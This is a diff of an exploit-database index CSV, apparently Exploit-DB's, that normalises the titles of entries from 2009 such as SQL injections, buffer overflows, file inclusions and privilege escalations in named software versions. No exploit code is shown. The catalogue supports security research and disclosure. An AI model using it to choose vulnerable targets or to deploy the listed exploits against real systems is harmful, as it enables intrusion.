-9589,platforms/windows/local/9589.pl,"OTSTurntables 1.00.027 - '.m3u' / '.ofl' Local Universal Buffer Overflow Exploit (SEH)",2009-09-04,hack4love,windows,local,0 -9590,platforms/php/webapps/9590.c,"Zeroboard 4.1 pl7 - now_connect() Remote Code Execution Exploit",2009-09-04,SpeeDr00t,php,webapps,0 +9589,platforms/windows/local/9589.pl,"OtsTurntables 1.00.027 - '.m3u' / '.ofl' Local Universal Buffer Overflow Exploit (SEH)",2009-09-04,hack4love,windows,local,0 +9590,platforms/php/webapps/9590.c,"ZeroBoard 4.1 pl7 - now_connect() Remote Code Execution",2009-09-04,SpeeDr00t,php,webapps,0 9591,platforms/php/webapps/9591.txt,"Ticket Support Script - 'ticket.php' Arbitrary File Upload",2009-09-04,InjEctOr5,php,webapps,0 9592,platforms/windows/remote/9592.rb,"SIDVault 2.0e - Windows Remote Buffer Overflow (Metasploit)",2009-09-04,His0k4,windows,remote,389 9593,platforms/php/webapps/9593.txt,"Joomla Compenent com_joomlub - (aid) SQL Injection",2009-09-04,"599eme Man",php,webapps,0 -9594,platforms/windows/dos/9594.txt,"Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote BSOD",2009-09-09,"laurent gaffie",windows,dos,0 +9594,platforms/windows/dos/9594.txt,"Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote BSOD",2009-09-09,"laurent gaffie",windows,dos,0 9595,platforms/linux/local/9595.c,"HTMLDOC 1.8.27 - (html File Handling) Stack Buffer Overflow",2009-09-09,"Pankaj Kohli",linux,local,0 9596,platforms/windows/remote/9596.py,"SIDVault 2.0e - Windows Universal Buffer Overflow (SEH)",2009-09-09,SkuLL-HackeR,windows,remote,389 9597,platforms/windows/dos/9597.txt,"Novell eDirectory 8.8 SP5 - Remote Denial of Service",2009-09-09,karak0rsan,windows,dos,0 @@ -9075,12 +9076,12 @@ id,file,description,date,author,platform,type,port 9611,platforms/php/webapps/9611.txt,"PHPNagios 1.2.0 - (menu.php) Local File Inclusion",2009-09-09,CoBRa_21,php,webapps,0 9612,platforms/asp/webapps/9612.txt,"ChartDirector 5.0.1 - (cacheId) Arbitrary File Disclosure",2009-09-09,DokFLeed,asp,webapps,0 9613,platforms/windows/remote/9613.py,"FTPShell Client 4.1 RC2 - Remote Buffer Overflow (Universal)",2009-09-09,His0k4,windows,remote,0 -9615,platforms/windows/remote/9615.jar,"Pidgin MSN 2.5.8 - Remote Code Execution Exploit",2009-09-09,"Pierre Nogues",windows,remote,0 +9615,platforms/windows/remote/9615.jar,"Pidgin MSN 2.5.8 - Remote Code Execution",2009-09-09,"Pierre Nogues",windows,remote,0 9617,platforms/windows/dos/9617.txt,"Dnsmasq < 2.50 - Heap Overflow / Null pointer Dereference",2009-09-09,"Core Security",windows,dos,0 9618,platforms/windows/local/9618.php,"Millenium MP3 Studio - (pls/mpf/m3u) Local Universal Buffer Overflow Exploits (SEH)",2009-09-09,hack4love,windows,local,0 9619,platforms/windows/local/9619.pl,"jetAudio 7.1.9.4030 plus - vx(asx/wax/wvx) Universal Local Buffer Overflow (SEH)",2009-09-09,hack4love,windows,local,0 9620,platforms/windows/dos/9620.pl,"Media Player Classic 6.4.9 - '.mid' Integer Overflow (PoC)",2009-09-09,PLATEN,windows,dos,0 -9621,platforms/windows/dos/9621.txt,"Kolibri+ Webserver 2 - (Get Request) Denial of Service",2009-09-10,"Usman Saeed",windows,dos,0 +9621,platforms/windows/dos/9621.txt,"Kolibri+ WebServer 2 - (Get Request) Denial of Service",2009-09-10,"Usman Saeed",windows,dos,0 9622,platforms/windows/dos/9622.py,"WarFTPd 1.82.00-RC12 - (LIST command) Format String Denial of Service",2009-09-10,corelanc0d3r,windows,dos,0 9623,platforms/php/webapps/9623.txt,"Advanced Comment System 1.0 - Multiple Remote File Inclusion",2009-09-10,Kurd-Team,php,webapps,0 9624,platforms/windows/local/9624.py,"KSP 2009R2 - '.m3u' Universal Local Buffer Overflow (SEH)",2009-09-10,hack4love,windows,local,0 @@ -9089,7 +9090,7 @@ id,file,description,date,author,platform,type,port 9627,platforms/linux/local/9627.txt,"Enlightenment - Linux Null PTR Dereference Exploit Framework",2009-09-10,spender,linux,local,0 9628,platforms/windows/local/9628.pl,"Icarus 2.0 - '.pgn' Universal Local Buffer Overflow (SEH)",2009-09-10,germaya_x,windows,local,0 9629,platforms/php/webapps/9629.txt,"Graffiti CMS 1.x - Arbitrary File Upload",2009-09-10,"Alexander Concha",php,webapps,0 -9630,platforms/php/webapps/9630.txt,"MYRE Holiday Rental Manager - (action) SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 +9630,platforms/php/webapps/9630.txt,"MYRE Holiday Rental Manager - 'action' SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 9631,platforms/php/webapps/9631.txt,"iDesk - 'download.php cat_id' SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 9632,platforms/php/webapps/9632.txt,"Accommodation Hotel Booking Portal - (hotel_id) SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 9633,platforms/php/webapps/9633.txt,"Bus Script - (sitetext_id) SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 @@ -9097,13 +9098,13 @@ id,file,description,date,author,platform,type,port 9635,platforms/php/webapps/9635.txt,"Drunken:Golem Gaming Portal - 'admin_news_bot.php' Remote File Inclusion",2009-09-10,"EA Ngel",php,webapps,0 9636,platforms/php/webapps/9636.txt,"An image Gallery 1.0 - (navigation.php) Local Directory Traversal",2009-09-10,"ThE g0bL!N",php,webapps,0 9637,platforms/php/webapps/9637.txt,"T-HTB Manager 0.5 - Multiple Blind SQL Injection",2009-09-10,"Salvatore Fresta",php,webapps,0 -9638,platforms/windows/remote/9638.txt,"Kolibri+ Webserver 2 - Source Code Disclosure",2009-09-11,SkuLL-HackeR,windows,remote,0 +9638,platforms/windows/remote/9638.txt,"Kolibri+ WebServer 2 - Source Code Disclosure",2009-09-11,SkuLL-HackeR,windows,remote,0 9639,platforms/php/webapps/9639.txt,"Image voting 1.0 - (index.php show) SQL Injection",2009-09-11,SkuLL-HackeR,php,webapps,0 9640,platforms/php/webapps/9640.txt,"gyro 5.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-09-11,OoN_Boy,php,webapps,0 9641,platforms/linux/local/9641.txt,"Linux Kernel 2.4 / 2.6 - 'sock_sendpage()' Privilege Escalation (3)",2009-09-11,"Ramon Valle",linux,local,0 -9642,platforms/multiple/dos/9642.py,"FreeRadius < 1.1.8 - Zero-length Tunnel-Password Denial of Service",2009-09-11,"Matthew Gillespie",multiple,dos,1812 -9643,platforms/windows/remote/9643.txt,"kolibri+ webserver 2 - Directory Traversal",2009-09-11,"Usman Saeed",windows,remote,0 -9644,platforms/windows/remote/9644.py,"Kolibri+ Webserver 2 - (GET Request) Remote SEH Overwrite",2009-09-11,blake,windows,remote,80 +9642,platforms/multiple/dos/9642.py,"FreeRadius < 1.1.8 - Zero-Length Tunnel-Password Denial of Service",2009-09-11,"Matthew Gillespie",multiple,dos,1812 +9643,platforms/windows/remote/9643.txt,"kolibri+ WebServer 2 - Directory Traversal",2009-09-11,"Usman Saeed",windows,remote,0 +9644,platforms/windows/remote/9644.py,"Kolibri+ WebServer 2 - (GET Request) Remote SEH Overwrite",2009-09-11,blake,windows,remote,80 9645,platforms/aix/local/9645.sh,"IBM AIX 5.6/6.1 - _LIB_INIT_DBG Arbitrary File Overwrite via Libc Debug",2009-09-11,"Marco Ivaldi",aix,local,0 9646,platforms/hardware/dos/9646.php,"Siemens Gigaset SE361 WLAN - Remote Reboot Exploit",2009-09-11,crashbrz,hardware,dos,0 9647,platforms/php/webapps/9647.txt,"PHP-IPNMonitor - (maincat_id) SQL Injection",2009-09-11,noname,php,webapps,0 @@ -9118,18 +9119,18 @@ id,file,description,date,author,platform,type,port 9656,platforms/php/webapps/9656.txt,"Aurora CMS 1.0.2 - (install.plugin.php) Remote File Inclusion",2009-09-14,"EA Ngel",php,webapps,0 9657,platforms/windows/dos/9657.pl,"httpdx Web Server 1.4 - (Host Header) Remote Format String Denial of Service",2009-09-14,"Pankaj Kohli",windows,dos,0 9658,platforms/hardware/remote/9658.txt,"Neufbox NB4-R1.5.10-MAIN - Persistent Cross-Site Scripting",2009-09-14,"599eme Man",hardware,remote,0 -9659,platforms/windows/local/9659.cpp,"Portable E.M Magic Morph 1.95b - .MOR File Stack Buffer Overflow (PoC)",2009-09-14,"fl0 fl0w",windows,local,0 +9659,platforms/windows/local/9659.cpp,"Portable E.M Magic Morph 1.95b - '.MOR' File Stack Buffer Overflow (PoC)",2009-09-14,"fl0 fl0w",windows,local,0 9660,platforms/windows/remote/9660.pl,"Techlogica HTTP Server 1.03 - Arbitrary File Disclosure Exploit",2009-09-14,"ThE g0bL!N",windows,remote,0 9661,platforms/windows/local/9661.c,"MP3 Studio 1.0 - '.m3u' Local Buffer Overflow",2009-09-14,dmc,windows,local,0 9662,platforms/windows/remote/9662.c,"IPSwitch IMAP Server 9.20 - Remote Buffer Overflow",2009-09-14,dmc,windows,remote,143 9663,platforms/windows/remote/9663.py,"Mozilla Firefox 2.0.0.16 - UTF-8 URL Remote Buffer Overflow",2009-09-14,dmc,windows,remote,0 -9664,platforms/windows/dos/9664.py,"FtpXQ FTP Server 3.0 - Remote Denial of Service (Post-Authenticated)",2009-09-14,PLATEN,windows,dos,0 +9664,platforms/windows/dos/9664.py,"FtpXQ FTP Server 3.0 - (Post-Authentication) Remote Denial of Service",2009-09-14,PLATEN,windows,dos,0 9665,platforms/php/webapps/9665.pl,"PHP Pro Bid - Blind SQL Injection",2009-09-14,NoGe,php,webapps,0 9666,platforms/hardware/dos/9666.php,"Apple Safari IPhone - (using tel:) Remote Crash Exploit",2009-09-14,cloud,hardware,dos,0 9667,platforms/windows/dos/9667.c,"Cerberus FTP Server 3.0.3 - Remote Denial of Service",2009-09-14,"Single Eye",windows,dos,0 9668,platforms/windows/dos/9668.txt,"Batch Picture Watemark 1.0 - '.jpg' Local Crash (PoC)",2009-09-14,the_Edit0r,windows,dos,0 9669,platforms/php/webapps/9669.txt,"Bs Counter 2.5.3 - (page) SQL Injection",2009-09-14,Bgh7,php,webapps,0 -9670,platforms/windows/dos/9670.txt,"FotoTagger 2.12.0.0 - (.XML) Buffer Overflow (PoC)",2009-09-14,the_Edit0r,windows,dos,0 +9670,platforms/windows/dos/9670.txt,"FotoTagger 2.12.0.0 - '.XML' Buffer Overflow (PoC)",2009-09-14,the_Edit0r,windows,dos,0 9671,platforms/windows/dos/9671.py,"Tuniac 090517c - '.pls' Local Crash (PoC)",2009-09-14,zAx,windows,dos,0 9672,platforms/windows/dos/9672.py,"PowerISO 4.0 - Local Buffer Overflow (PoC)",2009-09-14,Dr_IDE,windows,dos,0 9673,platforms/windows/remote/9673.py,"BigAnt Server 2.50 - GET Request Remote Buffer Overflow Exploit (SEH)",2009-09-15,blake,windows,remote,6660 @@ -9137,22 +9138,22 @@ id,file,description,date,author,platform,type,port 9675,platforms/asp/webapps/9675.txt,"HotWeb Rentals - 'details.asp PropId' Blind SQL Injection",2009-09-15,R3d-D3V!L,asp,webapps,0 9676,platforms/windows/remote/9676.txt,"BRS Webweaver 1.33 - /Scripts Access Restriction Bypass",2009-09-15,"Usman Saeed",windows,remote,0 9677,platforms/windows/dos/9677.c,"HERO SUPER PLAYER 3000 - '.m3u' Buffer Overflow (PoC)",2009-09-15,"fl0 fl0w",windows,dos,0 -9680,platforms/windows/local/9680.txt,"Protector Plus Antivirus 8/9 - Privilege Escalation",2009-09-15,"Maxim A. Kulakov",windows,local,0 +9680,platforms/windows/local/9680.txt,"Protector Plus AntiVirus 8/9 - Privilege Escalation",2009-09-15,"Maxim A. Kulakov",windows,local,0 9681,platforms/php/webapps/9681.txt,"efront 3.5.4 - (database.php path) Remote File Inclusion",2009-09-15,"cr4wl3r ",php,webapps,0 -9682,platforms/windows/dos/9682.txt,"Adobe ShockWave Player 11.5.1.601 - ActiveX Buffer Overflow (PoC)",2009-09-15,"Francis Provencher",windows,dos,0 +9682,platforms/windows/dos/9682.txt,"Adobe Shockwave Player 11.5.1.601 - ActiveX Buffer Overflow (PoC)",2009-09-15,"Francis Provencher",windows,dos,0 9683,platforms/windows/dos/9683.txt,"Novell Groupwise Client 7.0.3.1294 - ActiveX Denial of Service (PoC)",2009-09-15,"Francis Provencher",windows,dos,0 9684,platforms/windows/dos/9684.txt,"EasyMail Quicksoft 6.0.2.0 - ActiveX Remote Code Execution (PoC)",2009-09-15,"Francis Provencher",windows,dos,0 9685,platforms/windows/dos/9685.txt,"EasyMail Quicksoft 6.0.2.0 - (CreateStore) ActiveX Code Execution (PoC)",2009-09-15,"Francis Provencher",windows,dos,0 9686,platforms/windows/dos/9686.py,"VLC Media Player < 0.9.6 - (CUE) Local Buffer Overflow (PoC)",2009-09-15,Dr_IDE,windows,dos,0 9687,platforms/windows/local/9687.py,"SAP Player 0.9 - '.pla' Universal Local Buffer Overflow (SEH)",2009-09-15,mr_me,windows,local,0 -9688,platforms/hardware/local/9688.txt,"NetAccess IP3 - (ping option) Command Injection (Post-Authenticated)",2009-09-15,r00t,hardware,local,0 +9688,platforms/hardware/local/9688.txt,"NetAccess IP3 - (Post-Authentication) (ping option) Command Injection",2009-09-15,r00t,hardware,local,0 9689,platforms/windows/dos/9689.pl,"MP3 Collector 2.3 - '.m3u' Local Crash (PoC)",2009-09-15,zAx,windows,dos,0 9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 - GET Request Remote Buffer Overflow Exploit (SEH) Universal",2009-09-15,hack4love,windows,remote,6660 9691,platforms/windows/dos/9691.pl,"DJ Studio Pro 4.2 - '.pls' Local Crash Exploit",2009-09-15,prodigy,windows,dos,0 9692,platforms/php/webapps/9692.txt,"iBoutique.MALL 1.2 - (cat) Blind SQL Injection",2009-09-15,InjEctOr5,php,webapps,0 9693,platforms/php/webapps/9693.txt,"Joomla Component com_djcatalog - SQL Injection / Blind SQL Injection",2009-09-15,"Chip d3 bi0s",php,webapps,0 9694,platforms/windows/remote/9694.txt,"NaviCOPA Web Server 3.01 - Source Code Disclosure",2009-09-16,Dr_IDE,windows,remote,0 -9695,platforms/windows/dos/9695.py,"BigAnt Server 2.50 SP1 - (.zip) Local Buffer Overflow (PoC)",2009-09-16,Dr_IDE,windows,dos,0 +9695,platforms/windows/dos/9695.py,"BigAnt Server 2.50 SP1 - '.zip' Local Buffer Overflow (PoC)",2009-09-16,Dr_IDE,windows,dos,0 9696,platforms/php/webapps/9696.txt,"AdsDX 3.05 - (Authentication Bypass) SQL Injection",2009-09-16,snakespc,php,webapps,0 9697,platforms/php/webapps/9697.txt,"Joomla com_foobla_suggestions (idea_id) 1.5.11 - SQL Injection",2009-09-16,"Chip d3 bi0s",php,webapps,0 9698,platforms/php/webapps/9698.pl,"Joomla Component com_jlord_rss - 'id' Blind SQL Injection",2009-09-16,"Chip d3 bi0s",php,webapps,0 @@ -9163,11 +9164,11 @@ id,file,description,date,author,platform,type,port 9703,platforms/php/webapps/9703.txt,"phpPollScript 1.3 - (include_class) Remote File Inclusion",2009-09-16,"cr4wl3r ",php,webapps,0 9704,platforms/windows/remote/9704.html,"Quiksoft EasyMail 6.0.3.0 - imap connect() ActiveX Buffer Overflow Exploit",2009-09-17,"Sebastian Wolfgarten",windows,remote,0 9705,platforms/windows/remote/9705.html,"Quiksoft EasyMail 6 - (AddAttachment) Remote Buffer Overflow",2009-09-17,bmgsec,windows,remote,0 -9706,platforms/php/webapps/9706.txt,"joomla component com_album 1.14 - Directory Traversal",2009-09-17,DreamTurk,php,webapps,0 +9706,platforms/php/webapps/9706.txt,"joomla Component com_album 1.14 - Directory Traversal",2009-09-17,DreamTurk,php,webapps,0 9707,platforms/windows/dos/9707.pl,"Ease Audio Cutter 1.20 - '.wav' Local Crash (PoC)",2009-09-17,zAx,windows,dos,0 9708,platforms/php/webapps/9708.txt,"OpenSiteAdmin 0.9.7b - (pageHeader.php path) Remote File Inclusion",2009-09-17,"EA Ngel",php,webapps,0 9709,platforms/linux/local/9709.txt,"Changetrack 4.3-3 - Privilege Escalation",2009-09-17,Rick,linux,local,0 -9710,platforms/php/webapps/9710.txt,"CF Shopkart 5.3x - (itemid) SQL Injection",2009-09-17,"learn3r hacker",php,webapps,0 +9710,platforms/php/webapps/9710.txt,"CF Shopkart 5.3x - 'itemID' SQL Injection",2009-09-17,"learn3r hacker",php,webapps,0 9711,platforms/php/webapps/9711.txt,"FMyClone 2.3 - Multiple SQL Injections",2009-09-17,"learn3r hacker",php,webapps,0 9712,platforms/php/webapps/9712.txt,"Nephp Publisher Enterprise 4.5 - (Authentication Bypass) SQL Injection",2009-09-17,"learn3r hacker",php,webapps,0 9713,platforms/php/webapps/9713.pl,"Joomla Component com_jreservation 1.5 - 'pid' Blind SQL Injection",2009-09-17,"Chip d3 bi0s",php,webapps,0 @@ -9186,13 +9187,13 @@ id,file,description,date,author,platform,type,port 9727,platforms/multiple/webapps/9727.txt,"CMScontrol (Content Management Portal Solutions) - SQL Injection",2009-09-21,ph1l1ster,multiple,webapps,0 9728,platforms/multiple/webapps/9728.txt,"ProdLer 2.0 - Remote File Inclusion",2009-09-21,"cr4wl3r ",multiple,webapps,0 9729,platforms/multiple/webapps/9729.txt,"Loggix Project 9.4.5 - Multiple Remote File Inclusion",2009-09-21,"cr4wl3r ",multiple,webapps,0 -9730,platforms/multiple/webapps/9730.txt,"WX GuestBook 1.1.208 - SQL Injection / Persistent Cross-Site Scripting",2009-09-21,learn3r,multiple,webapps,0 +9730,platforms/multiple/webapps/9730.txt,"WX Guestbook 1.1.208 - SQL Injection / Persistent Cross-Site Scripting",2009-09-21,learn3r,multiple,webapps,0 9731,platforms/multiple/dos/9731.txt,"Snort unified 1 IDS Logging - Alert Evasion & Logfile Corruption/Alert Falsify",2009-09-21,"Pablo Rincón Crespo",multiple,dos,0 -9732,platforms/multiple/webapps/9732.txt,"Joomla component com_jinc 0.2 - (newsid) Blind SQL Injection",2009-09-21,"Chip d3 bi0s",multiple,webapps,0 -9733,platforms/multiple/webapps/9733.pl,"Joomla component com_mytube (user_id) 1.0 Beta - Blind SQL Injection",2009-09-21,"Chip d3 bi0s",multiple,webapps,0 -9734,platforms/windows/dos/9734.py,"BigAnt Server 2.50 SP6 - (.zip) Local Buffer Overflow PoC (2)",2009-09-21,Dr_IDE,windows,dos,0 +9732,platforms/multiple/webapps/9732.txt,"Joomla Component com_jinc 0.2 - (newsid) Blind SQL Injection",2009-09-21,"Chip d3 bi0s",multiple,webapps,0 +9733,platforms/multiple/webapps/9733.pl,"Joomla Component com_mytube (user_id) 1.0 Beta - Blind SQL Injection",2009-09-21,"Chip d3 bi0s",multiple,webapps,0 +9734,platforms/windows/dos/9734.py,"BigAnt Server 2.50 SP6 - '.zip' Local Buffer Overflow PoC (2)",2009-09-21,Dr_IDE,windows,dos,0 9800,platforms/windows/remote/9800.cpp,"Serv-U Web Client 9.0.0.5 - Buffer Overflow (2)",2009-11-05,"Megumi Yanagishita",windows,remote,80 -9801,platforms/php/webapps/9801.txt,"FlatPress 0.804 < 0.812.1 - Local File Inclusion",2009-09-29,"Giuseppe Fuggiano",php,webapps,0 +9801,platforms/php/webapps/9801.txt,"Flatpress 0.804 < 0.812.1 - Local File Inclusion",2009-09-29,"Giuseppe Fuggiano",php,webapps,0 9802,platforms/windows/remote/9802.html,"IBM Installation Manager 1.3.0 - iim:// URI handler Exploit",2009-09-29,bruiser,windows,remote,0 9803,platforms/windows/remote/9803.html,"EMC Captiva QuickScan Pro 4.6 SP1 and EMC Documentum ApllicationXtender Desktop 5.4 (keyhelp.ocx 1.2.312) - Remote Exploit",2009-09-29,pyrokinesis,windows,remote,0 9804,platforms/windows/dos/9804.rb,"XM Easy Personal FTP Server 5.8.0 - Denial of Service (Metasploit)",2009-11-10,zhangmc,windows,dos,21 @@ -9212,15 +9213,15 @@ id,file,description,date,author,platform,type,port 9819,platforms/multiple/webapps/9819.txt,"Engeman 6.x - SQL Injection",2009-09-25,crashbrz,multiple,webapps,0 9820,platforms/php/webapps/9820.txt,"Regental Medien - Blind SQL Injection",2009-09-24,NoGe,php,webapps,0 9821,platforms/php/webapps/9821.txt,"FSphp 0.2.1 - Remote File Inclusion",2009-09-24,NoGe,php,webapps,0 -9822,platforms/php/webapps/9822.txt,"Joomla Fastball component 1.1.0-1.2 - SQL Injection",2009-09-24,kaMtiEz,php,webapps,0 +9822,platforms/php/webapps/9822.txt,"Joomla Fastball Component 1.1.0-1.2 - SQL Injection",2009-09-24,kaMtiEz,php,webapps,0 9823,platforms/solaris/dos/9823.c,"Sun Solaris 10 RPC dmispd - Denial of Service",2009-09-24,"Jeremy Brown",solaris,dos,0 9824,platforms/php/webapps/9824.txt,"Swiss Mango CMS - SQL Injection",2009-09-24,kaMtiEz,php,webapps,0 9825,platforms/php/webapps/9825.txt,"e107 0.7.16 - Referer header Cross-Site Scripting",2009-09-24,MustLive,php,webapps,0 9826,platforms/php/webapps/9826.txt,"MindSculpt CMS - SQL Injection",2009-09-24,kaMitEz,php,webapps,0 9828,platforms/php/webapps/9828.txt,"OSSIM 2.1 - SQL Injection / Cross-Site Scripting",2009-09-23,"Alexey Sintsov",php,webapps,0 -9829,platforms/multiple/remote/9829.txt,"nginx 0.7.61 - WebDAV Directory Traversal",2009-09-23,kingcope,multiple,remote,80 +9829,platforms/multiple/remote/9829.txt,"Nginx 0.7.61 - WebDAV Directory Traversal",2009-09-23,kingcope,multiple,remote,80 9830,platforms/php/webapps/9830.txt,"Cour Supreme - SQL Injection",2009-09-23,"CrAzY CrAcKeR",php,webapps,0 -9831,platforms/windows/local/9831.txt,"Avast Antivirus 4.8.1351.0 - Denial of Service / Privilege Escalation",2009-09-23,Evilcry,windows,local,0 +9831,platforms/windows/local/9831.txt,"Avast AntiVirus 4.8.1351.0 - Denial of Service / Privilege Escalation",2009-09-23,Evilcry,windows,local,0 9832,platforms/php/webapps/9832.txt,"Joomla/Mambo Tupinambis - SQL Injection",2009-09-22,"Don Tukulesto",php,webapps,0 9833,platforms/php/webapps/9833.txt,"Joomla com_facebook - SQL Injection",2009-09-22,kaMtiEz,php,webapps,0 9834,platforms/asp/webapps/9834.txt,"BPLawyerCaseDocuments - SQL Injection",2009-09-22,"OoN Boy",asp,webapps,0 @@ -9234,26 +9235,26 @@ id,file,description,date,author,platform,type,port 9842,platforms/php/local/9842.txt,"PHP 5.3.0 - pdflib Arbitrary File Write",2009-11-06,"Sina Yazdanmehr",php,local,0 9843,platforms/multiple/remote/9843.txt,"Blender 2.34 / 2.35a / 2.4 / 2.49b - '.blend' Command Injection",2009-11-05,"Core Security",multiple,remote,0 9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1<2.4.37 / 2.6.1<2.6.32-rc5 - 'pipe.c' Privilege Escalation (3)",2009-11-05,"Matthew Bergin",linux,local,0 -9845,platforms/osx/dos/9845.c,"OSX 10.5.6-10.5.7 - ptrace mutex Denial of Service",2009-11-05,prdelka,osx,dos,0 +9845,platforms/osx/dos/9845.c,"Apple Mac OS X 10.5.6/10.5.7 - ptrace mutex Denial of Service",2009-11-05,prdelka,osx,dos,0 9847,platforms/php/webapps/9847.txt,"Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities",2009-11-04,Abysssec,php,webapps,0 9849,platforms/php/webapps/9849.php,"PunBB Extension Attachment 1.0.2 - SQL Injection",2009-11-03,puret_t,php,webapps,0 9850,platforms/php/webapps/9850.txt,"Xerox Fiery Webtools - SQL Injection",2009-11-03,"Bernardo Trigo",php,webapps,0 9851,platforms/windows/remote/9851.pl,"Xion Audio Player 1.0 121 - '.m3u' Buffer Overflow (1)",2009-11-03,corelanc0d3r,windows,remote,0 9852,platforms/windows/dos/9852.py,"Home FTP Server 1.10.1.139 - 'SITE INDEX' Command Remote Denial of Service",2009-11-16,zhangmc,windows,dos,21 9853,platforms/windows/remote/9853.rb,"Symantec ConsoleUtilities - ActiveX Buffer Overflow (Metasploit)",2009-11-02,"Nikolas Sotiriu",windows,remote,0 -9854,platforms/php/webapps/9854.txt,"tftgallery .13 - Directory Traversal Exploit",2009-11-02,blake,php,webapps,0 +9854,platforms/php/webapps/9854.txt,"TFTgallery .13 - Directory Traversal Exploit",2009-11-02,blake,php,webapps,0 9855,platforms/php/webapps/9855.txt,"Geeklog 1.6.0sr2 - Remote File Upload",2009-10-03,JaL0h,php,webapps,0 9856,platforms/asp/webapps/9856.txt,"Snitz Forums 2000 - Multiple Cross-Site Scripting Vulnerabilities",2009-10-15,"Andrea Fabrizi",asp,webapps,0 9857,platforms/asp/webapps/9857.txt,"AfterLogic WebMail Pro 4.7.10 - Cross-Site Scripting",2009-10-05,"Sébastien Duquette",asp,webapps,0 9858,platforms/hardware/remote/9858.txt,"Riorey RIOS 4.7.0 - Hardcoded Password",2009-10-08,"Marek Kroemeke",hardware,remote,8022 -9859,platforms/freebsd/local/9859.c,"FreeBSD 6.4 - pipeclose()/knlist_cleardel() race condition Exploit",2009-10-08,"Przemyslaw Frasunek",freebsd,local,0 -9860,platforms/freebsd/local/9860.c,"FreeBSD 7.2 VFS/devfs - race condition Exploit",2009-10-08,"Przemyslaw Frasunek",freebsd,local,0 +9859,platforms/freebsd/local/9859.c,"FreeBSD 6.4 - pipeclose()/knlist_cleardel() Race Condition Exploit",2009-10-08,"Przemyslaw Frasunek",freebsd,local,0 +9860,platforms/freebsd/local/9860.c,"FreeBSD 7.2 VFS/devfs - Race Condition Exploit",2009-10-08,"Przemyslaw Frasunek",freebsd,local,0 9861,platforms/unix/webapps/9861.rb,"Nagios3 - statuswml.cgi Command Injection (Metasploit)",2009-10-30,"H D Moore",unix,webapps,0 9862,platforms/hardware/remote/9862.txt,"3Com OfficeConnect - Code Execution",2009-10-19,"Andrea Fabizi",hardware,remote,0 9863,platforms/php/webapps/9863.txt,"Achievo 1.3.4 - Cross-Site Scripting",2009-10-14,"Ryan Dewhurst",php,webapps,0 9865,platforms/windows/local/9865.py,"Adobe Acrobat Reader 7<9 - U3D Buffer Overflow",2009-10-27,"Felipe Andres Manzano",windows,local,0 9866,platforms/windows/local/9866.txt,"Alleycode HTML Editor 2.2.1 - Buffer Overflow",2009-10-29,Dr_IDE,windows,local,0 -9867,platforms/php/webapps/9867.txt,"Amiro.CMS 5.4.0.0 - folder disclosure",2009-10-19,"Vladimir Vorontsov",php,webapps,0 +9867,platforms/php/webapps/9867.txt,"Amiro.CMS 5.4.0.0 - folder Disclosure",2009-10-19,"Vladimir Vorontsov",php,webapps,0 9871,platforms/windows/dos/9871.txt,"Boloto Media Player 1.0.0.9 - pls file Denial of Service",2009-10-27,Dr_IDE,windows,dos,0 9872,platforms/multiple/webapps/9872.txt,"boxalino 09.05.25-0421 - Directory Traversal",2009-10-20,"Axel Neumann",multiple,webapps,0 9873,platforms/windows/webapps/9873.txt,"Cherokee 0.5.4 - Directory Traversal",2009-10-28,Dr_IDE,windows,webapps,0 @@ -9262,16 +9263,16 @@ id,file,description,date,author,platform,type,port 9876,platforms/php/webapps/9876.txt,"DedeCMS 5.1 - SQL Injection",2009-10-14,"Securitylab Security Research",php,webapps,0 9877,platforms/asp/webapps/9877.txt,"DWebPro - Command Injection",2009-10-17,"Rafael Sousa",asp,webapps,0 9879,platforms/windows/dos/9879.txt,"EMC RepliStor Server 6.3.1.3 - Denial of Service",2009-10-20,"bellick ",windows,dos,7144 -9880,platforms/php/webapps/9880.txt,"Endonesia CMS 8.4 - Local File Inclusion",2009-11-04,s4r4d0,php,webapps,0 +9880,platforms/php/webapps/9880.txt,"eNdonesia CMS 8.4 - Local File Inclusion",2009-11-04,s4r4d0,php,webapps,0 9881,platforms/windows/dos/9881.txt,"Eureka Mail Client 2.2q - PoC Buffer Overflow",2009-10-23,"Francis Provencher",windows,dos,110 9882,platforms/windows/local/9882.txt,"Firefox 3.5.3 - Local Download Manager Temp File Creation",2009-10-28,"Jeremy Brown",windows,local,0 -9884,platforms/windows/local/9884.txt,"GPG2/Kleopatra 2.0.11 - Malformed certificate (PoC)",2009-10-21,Dr_IDE,windows,local,0 -9885,platforms/windows/webapps/9885.txt,"httpdx 1.4.6b - source disclosure",2009-10-21,Dr_IDE,windows,webapps,0 +9884,platforms/windows/local/9884.txt,"GPG2/Kleopatra 2.0.11 - Malformed Certificate (PoC)",2009-10-21,Dr_IDE,windows,local,0 +9885,platforms/windows/webapps/9885.txt,"httpdx 1.4.6b - source Disclosure",2009-10-21,Dr_IDE,windows,webapps,0 9886,platforms/windows/remote/9886.txt,"httpdx 1.4 - h_handlepeer Buffer Overflow (Metasploit)",2009-10-16,"Pankaj Kohli, Trancer",windows,remote,0 9887,platforms/jsp/webapps/9887.txt,"jetty 6.x < 7.x - Cross-Site Scripting / Information Disclosure / Injection",2009-10-26,"Antonion Parata",jsp,webapps,0 9888,platforms/php/webapps/9888.txt,"Joomla Ajax Chat 1.0 - Remote File Inclusion",2009-10-19,kaMtiEz,php,webapps,0 9889,platforms/php/webapps/9889.txt,"Joomla Book Library 1.0 - File Inclusion",2009-10-19,kaMtiEz,php,webapps,0 -9890,platforms/php/webapps/9890.txt,"Joomla JD-Wordpress 2.0 RC2 - Remote file icnlusion",2009-10-19,"Don Tukulesto",php,webapps,0 +9890,platforms/php/webapps/9890.txt,"Joomla JD-WordPress 2.0 RC2 - Remote File Inclusion",2009-10-19,"Don Tukulesto",php,webapps,0 9891,platforms/php/webapps/9891.txt,"Joomla Jshop - SQL Injection",2009-10-23,"Don Tukulesto",php,webapps,0 9892,platforms/php/webapps/9892.txt,"Joomla Photo Blog alpha 3 - alpha 3a SQL Injection",2009-10-23,kaMtiEz,php,webapps,0 